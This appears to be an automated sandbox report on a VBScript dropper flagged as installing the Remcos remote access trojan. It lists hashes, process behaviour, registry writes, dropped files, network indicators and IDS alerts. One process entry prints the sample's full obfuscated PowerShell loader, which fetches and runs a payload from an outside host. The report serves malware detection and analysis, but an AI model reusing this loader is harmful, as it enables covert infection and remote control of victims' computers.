File name:

Order_49763.vbs

Full analysis: https://app.any.run/tasks/0fa20886-880d-4d3b-b0cb-cc62d6910938
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: June 05, 2025, 06:33:18
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
rat
remcos
remote
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

39E8D4BE76AABF8314D7891F7547DDE0

SHA1:

CC6E764237BF4559365FB9A651E451D6D65EF1E6

SHA256:

DC8A7B7AA888342FBE510AF7016F9BD0048C5271112B25149A7657E5E4490F72

SSDEEP:

384:7S91QMDDu4TUPTZ+b6zdVgCBVpGJppfVFUVmb7bhHujmyRh5VRm8SHTzH:7C1re40BznfXpGvp/UseRfm8gXH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 5236)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 5236)

    • REMCOS has been detected

      • msiexec.exe (PID: 5556)

    • REMCOS mutex has been found

      • msiexec.exe (PID: 5556)

    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 5556)

  • SUSPICIOUS

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2600)

    • The process checks if it is being run in the virtual environment

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2600)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2600)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 5236)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 5236)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7856)

    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 5556)

    • Connects to unusual port

      • msiexec.exe (PID: 5556)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 5236)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Checks proxy server information

      • powershell.exe (PID: 5236)
      • msiexec.exe (PID: 5556)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5236)
      • powershell.exe (PID: 7856)

    • Manual execution by a user

      • powershell.exe (PID: 7856)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7856)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7856)

    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 5556)

    • Creates files or folders in the user directory

      • msiexec.exe (PID: 5556)

    • Reads the software policy settings

      • msiexec.exe (PID: 5556)
      • slui.exe (PID: 1512)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
14
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs sppextcomobj.exe no specs slui.exe powershell.exe conhost.exe no specs tiworker.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe svchost.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
660\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1512"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2600"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Order_49763.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5236"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-counter;Get-Service;$krohold='A'+ [char]58;Get-hotfix;$Conferential=(gcm $krohold).CommandType;$Conferential=[String]$Conferential;$riflens='Talemonger';$Conferential+=':';(ne`w-item -p $Conferential -n Involvers -value { param ($Pervader);$riflens='Paataleberettigede';$Transplantar=6;$Tidsindikator='Intersessional';do {$Helbredsgrunds+=$Pervader[$Transplantar];$Transplantar+=7} until(!$Pervader[$Transplantar])$Helbredsgrunds});(ne`w-item -p $Conferential -n Brists -value {param ($Sawfish98);.($Deairs183) ($Sawfish98)});ConvertTo-Html;$Skaaltalers=Involvers ' stormn Dial EB rrelTR serv.Titan w';$Skaaltalers+=Involvers ' SelskeFis.elBChondrcReaktiLS.eaksiSlvvrdeHanernnForge T';$Kodestrenge=Involvers ' BarbeMPre,ccoPladdez CytoaiNyligslGr,psal M.shraPrecar/';$Personam=Involvers ' Su fbTHaar.olPrintesAdrtun1Kinest2';$Heloises=' fsand[BillioNLegatbeTwinjetbor en.NoncatsManddaeS eetfrFolketvUddanniKaolincTa dfyEUndevepKlkkelOServanIRedninnAdderiTTilflymS,latta YieldNS.lphuAReco tGKllingE UnnatrDannel]H stoz: Quadl:AmbitisAphorie AdenoCMesentU VaandrMomsnvIHelgenTOveralYOdiserPHockdarUnsensO NeuroTOrledeO.ittercPerpleOCreedelBreckt=Lavali$Svrt dp Unwo EUdtvrer.kyllesFejlproPh.siknBortslaFormaaM';$Kodestrenge+=Involvers 'Unpast5 overs.Palvin0Stamin Bumpie(Pill sWGrafikiU inqunV,rbosdUnnod oTartlew List.sM nett Fla woN PanteT,adelk Pane,1 umbag0Sexolo.Gossip0Trisac;outvil Sg menWRele eiDrapernDibhol6Pregui4Re ion;Greyho Twel xLarree6Disili4Diah l;Dagdr ReemitrPalaeovQuaffe: Mo,bi1Seasho3Toggin7De lut.ta,vrd0 Urugu),ockne UniveGHyperde FlorscSmageakFamilio Ekspo/afterd2Digres0 ntib1Script0Dirked0Datala1B dget0Trykfd1Soiree TandhjFBobbiniSandhirHankereKlyderfOmnineoMarmorxImping/ rdrem1Sazera3Falk t7R vanc.Bi led0';$Anpartsselskabets=Involvers 'Bandidu UnepisDestruE maabrRUnreme-Lyeth.A totalGDiscjoERetrorNDys rgt';$plowboys=Involvers 'UncomphUnperftGidseltDefilapModstosS roph:Unhy h/indust/Inti,ifSchoolaNonph mSor smipauserlGriefryMankiet onarah Tja seRegdlurvallieaReliktpRatalfyPatr sc P,iloe,inussnDokumetJernbaeUnparerB,relr.Polymir Steves fterl/DalboeP MordeeDrift rsadness T,matodigox.nAt.ernlOutwiniAktuelgknivsthBogsi eIndgi d Capess SeniosproteopparlouaTriad,l SletntBlotlgnProkuriMagisnnStjer.gSkudlie RobotrPaatry. ultipa Sou,fsBrnefoi';$Ophiosaurus=Involvers 'Autoge>';$Deairs183=Involvers 'Vestpai To.tueDesertx';$Termodynamiske='Railed';$Adresseforskydningers='\Supervalue.Nod';Brists (Involvers ' ntrod$YartheGDiss,nl t.afiO.dgangb Ka noaFravegl Resis: BedesmUnlam EBegunstotopatounsleaD.ondedialo eksPersonMascendEReauth=Inv ib$Outm.nE KonkuNBaniyaVAthlet:TilflyaSpaghepKemot pAvisnddTan.spANonadhTLicentALoofne+ Sprog$GrnsevA VinegDTravlerCybercEIndonesElastiSarbejdE ArctiF Spl toBankakrSo.negs Ge.gaK FjordyCurso DMenustNHumoroiSyb rinBroling sflagEDonsy rVistots');Brists (Involvers ' Fem e$ ntikig ,ilocLUsmageOScalpebHyperiAHorizolCallee:R figntComputrBrocheuUlvensSRiotistfrike ETva.gsEBrnshj=K,rafl$ Voc fP Reop LRentetoAkut.fW FenesBBnkhagoHemaggYPorte SIgu no.EnlighsellipspUnevitL BoweriDistenTSeptik(b vids$ .nmrko HalvcpIntegrHRi zinIBond oo Derivs EntreaIltstyuSvimleR hawbauPolitiSCrayle)');Brists (Involvers $Heloises);$plowboys=$Trustee[0];$Lancepod=(Involvers 'unhy n$Press.GIncamelDehumiOBowldeBRhyobaaEchinoLPhytol: orvalDInversAKalvniNCondidBDrifteU HybrirtsermayKitnin=UninciNskinpre.aletuWHovmes-UndersOSleeveBKunstsJStupideWoolh c LycidtGonoph Rurit,s Opgany N gleSSprkk,TSuperbEBeclammSomato.amara $Nurleds GyldikFodsidaBiblioa ParafL CargatGrenecaNokbndlAphakieAgerkoRTravkus');Brists ($Lancepod);Brists (Involvers ' Po am$ne hroDTilbagaAktoranPrograbSolderu Gl corVord ny ostis. UnproHVr,gene Mus kaForbindEisenbeForfatrVindsts Natio[Isenkr$ De laABrndeknPilledp krmstaLkkencrRati,itLoffeusKalendsEibr teJugosll FranksKid apkA tjena Abs rbTasseleversiftSororasSmir.h]U bloo= Fla q$ magt KSmaaovoB neprd HexobeRals,osTvillitba busr,umsereUnwarbn DossigBrontoe');$Becomed=Involvers 'ObligaDBogbino abbvrw .rresn Reexpl Fej ro reeliau fanadCodifyFr,prodiC romalMnttele';$Haendt=Involvers ' Tyrke$KilimsDRubidiaDansesnK onerb ellemu.onarrrSil,ieyTagkam.Giddyu$ Tag,oBAgglutePalaiscDispono pindemUnmanieChar,ed Kardi.ProasfIQuina nOpknapv,nsepaoRetninkCountdeAverme( Lager$Ne,fibp DecollBlikdaoSkydelwHyp.enb SpilloharbifySemipisOnuses,Wingha$BreddeS BalletSubenteWeaselnPrem dgTyn.sluSkuffen I,itieEclairnMa,giteKvalitsFiber,)';$Stengunenes=$Metodisme;Brists (Involvers 'Brumme$BlodprgL.vslglOverliO D.famBMigratACastanLTellur:Skv,drb ImpawO PogroZStje noSygehuSEndomi=Buklen(Elve nT PromiEsmoothsBaisemTCa roc-As.araPWeemhaAleafcutRe rygHMtxout Vennep$Skovsys TelluTAftegnET dsatnFlyvegG AfblauMicrocNKernekeUlceraN.ntermEUnprossSodfar)');while (!$Bozos) {Brists (Involvers 'Puljer$Fla.lig FeathlInscr oRigoribD,rtidaTom esl Tomme:kerchubEtnogrr BaymeaGenhusmdistom=Out ri$HrelreSKle mepTu tenoHexosad Inveri odefiu Skiffm') ;Brists $Haendt;Brists (Involvers 'Tilb.i[ vanddTOprejsHNordlyrProscrESukkerA .odgeDS,vjediPhotojNLegendgJunkin.Whitert OmlssHVarskoRSobereePolerea egradYetzer]Pros,a:angina: Biobrs ntercl AmenteAffa.lE oinonPke.ser(Furmen4Trvlss0Ferrob0 sthes0Mngdel)');Brists (Involvers 'Op.ygg$MoraliGFodsvalnornaiOpjankeB .ankba etaiLSpiral:SliknebVictroOHonoraZStupr oGal insS mple=Behov.(Amillat obmasEMilitasU vouctImmeth-BrushiP Ov,rmaH.ktorTPlir pHProfi. Waggon$PartisSPeric.TTungesEcephalNV nstrGTiaspeuNonrabnCoolhee Nat oN UnlabeDosissSR tfrd)') ;Brists (Involvers 'Bushig$Scep rgF afrtlKon efoAm rtibCon idaGammelL Dybs : PaaliG JouncETarragSkundektPerisoiEvaporkLowmosUinformLN minaAAssurit cho.riForespOHidr.enArchae= Dem l$Om yttgAtteneLForespO ChankbStfronaAccompLProper:FluoreiSkole.s StenkOGlammepNobelpEIndfarnfuturiTRectotyCorreoL avtln+Ejakul+N.nsys%,evera$SituatT DrizzrFujitsu ,ovsaSGentletStrixdEFairf,ECcdrel. orhaacp,astpo ShiteuUnwaivNMalignt') ;$plowboys=$Trustee[$Gestikulation]}$Registertilsynets=362732;$Bevbner=32451;Brists (Involvers 'madr l$SaleraGformsslDanablOo erasbKompo aDeposaLCroomi:KvalitsRabandTB esluRAdgange UdbryGIncatenJet.isi ursusnSeedbegToboggeGo kenRHalchbNanomiaeModst S,lsej=Virkso FerielG No vieBryg eTSvi eb-N nopiCFlsommO profeNN.nsevtEusteleImplemnGing lTPampan Flyv h$ Smalls SkvadT P ramePhilosNcykel.GDivo,cuSpe,dbnUraeuseNigerin a terECaupo,S');Brists (Involvers 'D mini$ pugergAfrikalSl veloNathanbKjeninaSvinellB.kkes:FlaadeKTr chouCaabasrS marisFla ghnBu.teheAfhjlpdwhizzps R ssok Eloq rNomi eiT sindvFlebilnUncoveiCreatunStemm g loriceHjlpekrKejsernSkimpieAcanth Upaali= Konge Indvik[AncienSStvl,syBrugsfsNati,nt,replaeBearwomSuperu.UndercCRmensdo tilfrnBullhevAalndieStrumor Mithrtamaslr]Skaarl: Cr ne: ProhuFEksamerAphis,oGrundfmSuda iBL posta ereawsUrocereGa,ell6Saltsy4ScatheS olorltIatromrBrofagidiscornRedoubgAdmitt(Belaan$UnpermSS bclatEks rcrtappere agbrkgSikkern Acid.iGuav,nnStart,gtilbageFnidderSejlsknBaisseeLyknsk)');Brists (Involvers 'Overac$ assivGKnsforlAfg ftO FastebKaalsta An lyLtypega:Parafefsnjasnr,ansioAS taniGStan ni MorskK,tilpek Br nkewinaduSB eech Insurg=Slotsf Retske[ShibboSCuddl.yafg.anSblatenT eklaeSenegamSaddel. WhitetProporEBi.kemxStam etarmods. Underebeefien PhotocKerne O okfrodGenansistrickN HutukGKogeni]Po tie:Begreb: Ves.eAThan ts GenskCEle.abI istodIMilkne.Leukocg rakioetakistTE oders BasisTmetam RFri.tiIHe dstNPublisgSubcon(Agatho$ UmbelkSa risuKva ifR ejplasHalverNVsnetsE Kra.bd KarnasForhaaKMngdetrSkaberi oncliVOffshonSjlekviTer asnConditgdobbelEKvi.alRUhensin letfiEKnarr )');Brists (Involvers 'So fal$TmrerngUnhortLEncr.nO ngrambLig.alA AzonaLPho,og: Nobi aCe emoGWindsunForkamOAbortimResectEHypoganPhot msStofmi=Lderv $S ruggfZerklarOpkaldaMiljingKongrei LnsatkPledkaKOrd lleV,tiliSd tter.,vetydsProflauLinikaB Delfis.exbomtFinin rDila,iiTrfiskNCa oubg Leewa(Automa$T,ntatrBlockbESadelmG ImperIF rinosTryghetHackbueSodavarUdkrngt Pret.I Hologl UnsetS HaspeY .ristN filteEProfesTTestamS Okses,Quiz,a$Nis erbAfglatEComburVHk aksbKon ernHandsoeTruppeRSvalin)');Brists $Agnomens;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5556"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
5720C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
6044\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6048"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6476ping 127.0.0.1C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
Total events
28 898
Read events
28 887
Write events
11
Delete events
0

Modification events

(PID) Process:(5720) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31184355
(PID) Process:(5720) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423
Operation:writeName:exepath
Value:
D918CFA58E5D5580D9FBAF00A8A3F40E87AFA6176B04382213F5D30200AE2FCFBCDC1EFE1248D7B69A519EF6428B90C0EF2617C0B1E4CEA2EA2FFBDB91A17A56
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423
Operation:writeName:licence
Value:
91CACB065A3987C37275CBA558F3D020
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423
Operation:writeName:time
Value:
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-AV3423
Operation:writeName:UID
Value:
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5556) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
0
Suspicious files
7
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
7856powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3voccuz2.oci.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5556msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751der
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
7856powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v5vft1qt.uux.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5720TiWorker.exeC:\Windows\Logs\CBS\CBS.logtext
MD5:DD07E1F65BFB38C2BC717A30775EBB77
SHA256:51EE1E56F2DCA96357D644EF85B90C675E57618D33229BC052184E9508984EDA
5236powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:075C69EB6D23CCE0BDA5C250B52DDD35
SHA256:098DE25CF84966474048EF7FD9C3BCF9B9A9B50478007F59B93579A19352CCEF
5236powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgulrabu.5bw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5236powershell.exeC:\Users\admin\AppData\Roaming\Supervalue.Nodtext
MD5:4C2D71257514D99BFBC971BADA091CC5
SHA256:7DEEF2590A6B7E87F688D3657793B611814D6983D33E0C0E1E3E34E3CCBDBE10
5236powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejisiyqq.4yy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5556msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:18DD4C20EB878B615188FA8F9BC9F1DD
SHA256:48A2035C2ED67002A8278568FEC2A02B6E03668E551BB0435E76B626DFBDFEB4
7856powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1hogeuop.jiq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
26
DNS requests
18
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.20.245.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5576
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5576
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5556
msiexec.exe
GET
200
65.9.66.96:80
http://r11.c.lencr.org/69.crl
unknown
whitelisted
5556
msiexec.exe
GET
200
2.23.197.184:80
http://x1.c.lencr.org/
unknown
whitelisted
5556
msiexec.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4616
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5408
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.20.245.139:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2112
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5408
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
crl.microsoft.com
  • 2.20.245.139
  • 2.20.245.135
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 23.219.150.101
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
familytherapycenter.rs
  • 188.40.95.144
unknown
login.live.com
  • 40.126.32.74
  • 20.190.160.65
  • 20.190.160.20
  • 20.190.160.5
  • 20.190.160.67
  • 40.126.32.140
  • 20.190.160.132
  • 40.126.32.68
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
5556
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
5556
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Order_49763.vbs